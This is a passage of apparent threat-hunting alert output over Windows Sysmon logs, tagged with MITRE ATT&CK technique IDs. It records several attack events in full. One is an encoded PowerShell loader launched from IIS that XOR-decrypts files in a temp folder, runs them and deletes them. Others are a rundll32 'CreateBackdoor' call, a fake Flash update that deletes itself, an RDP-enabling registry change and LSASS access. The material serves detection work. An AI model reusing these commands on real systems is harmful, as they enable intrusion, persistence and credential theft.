"C:\Users\IEUser\Downloads\Flash_update.exe" ),1," 1 5 4 1 0 0x8000000000000000 6622 Microsoft-Windows-Sysmon/Operational IEWIN7 technique_id=T1059,technique_name=Command-Line Interface 2019-04-27 15:57:54.087 365ABB72-7C02-5CC4-0000-0010FD6E0C00 3188 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\cmd.exe" /c del /q "C:\Users\IEUser\Downloads\Flash_update.exe" C:\Users\IEUser\AppData\Roaming\ IEWIN7\IEUser 365ABB72-7AB1-5CC4-0000-0020BEF40000 0xf4be 1 High SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-7C01-5CC4-0000-00102B3E0C00 2680 C:\Users\IEUser\Downloads\Flash_update.exe "C:\Users\IEUser\Downloads\Flash_update.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1112] process updating fDenyTSConnections or UserAuthentication registry key values,1552853889.282593,2019-03-18T00:18:09.282593+04:00,,Threat,High,[T1112] process updating fDenyTSConnections or UserAuthentication registry key values,13," 13 2 4 13 0 0x8000000000000000 5267 Microsoft-Windows-Sysmon/Operational PC04.example.corp SetValue 2019-03-17 20:18:09.272 365ABB72-AB70-5C8E-0000-0010DF1F0A00 3700 C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections DWORD (0x00000000) ",PC04.example.corp,Microsoft-Windows-Sysmon/Operational [ T1086 ] Powershell with Suspicious Argument,1558920522.711005,2019-05-27T05:28:42.711005+04:00,,Threat,Critical,"Found User (IIS APPPOOL\DefaultAppPool) run Suspicious PowerShell commands that include ( -enc , -noni ,-noni,-nop,powershell,\Windows\System32,ls, -t , -w ) in event with Command Line ("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==) and Parent Image :C:\Windows\System32\inetsrv\w3wp.exe , Parent CommandLine (c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20) in directory : ( C:\Windows\Temp\ )",1," 1 5 4 1 0 0x8000000000000000 5875 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:28:42.700 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C 365ABB72-3251-5CEB-0000-00109E06E100 748 C:\Windows\System32\inetsrv\w3wp.exe c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20 ",IEWIN7,Microsoft-Windows-Sysmon/Operational [ T1003 ] Credential Dumping ImageLoad,1555606693.74034,2019-04-18T20:58:13.740340+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," 7 3 4 7 0 0x8000000000000000 20 Microsoft-Windows-Sysmon/Operational IEWIN7 technique_id=T1003,technique_name=Credential Dumping 2019-04-18 16:58:13.560 365ABB72-AC28-5CB8-0000-0010F3F70700 1200 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\hid.dll 6.1.7600.16385 (win7_rtm.090713-1255) Hid User Library Microsoft® Windows® Operating System Microsoft Corporation SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE true Microsoft Windows Valid ",IEWIN7,Microsoft-Windows-Sysmon/Operational Detect IIS/Exchange Exploitation,1558920522.711005,2019-05-27T05:28:42.711005+04:00,,Threat,Critical,IIS run command with user (IIS APPPOOL\DefaultAppPool) and process name (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) and commandline ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ),1," 1 5 4 1 0 0x8000000000000000 5875 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:28:42.700 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C 365ABB72-3251-5CEB-0000-00109E06E100 748 C:\Windows\System32\inetsrv\w3wp.exe c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20 ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1584766825.242652,2020-03-21T09:00:25.242652+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," 1 5 4 1 0 0x8000000000000000 243544 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:25.077 747F3D96-9F69-5E75-0000-0010476F2000 7836 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe)",1," 1 5 4 1 0 0x8000000000000000 16507 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 17:09:02.275 365ABB72-532E-5CD8-0000-00106C222700 1528 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe C:\Users\IEUser\ IEWIN7\IEUser 365ABB72-4FB5-5CD8-0000-0020F2350100 0x135f2 1 Medium SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-516B-5CD8-0000-001087E41600 3788 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606693.74034,2019-04-18T20:58:13.740340+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," 7 3 4 7 0 0x8000000000000000 20 Microsoft-Windows-Sysmon/Operational IEWIN7 technique_id=T1003,technique_name=Credential Dumping 2019-04-18 16:58:13.560 365ABB72-AC28-5CB8-0000-0010F3F70700 1200 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\hid.dll 6.1.7600.16385 (win7_rtm.090713-1255) Hid User Library Microsoft® Windows® Operating System Microsoft Corporation SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE true Microsoft Windows Valid ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1086] PowerShell Process found,1558920522.711005,2019-05-27T05:28:42.711005+04:00,,Threat,High,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 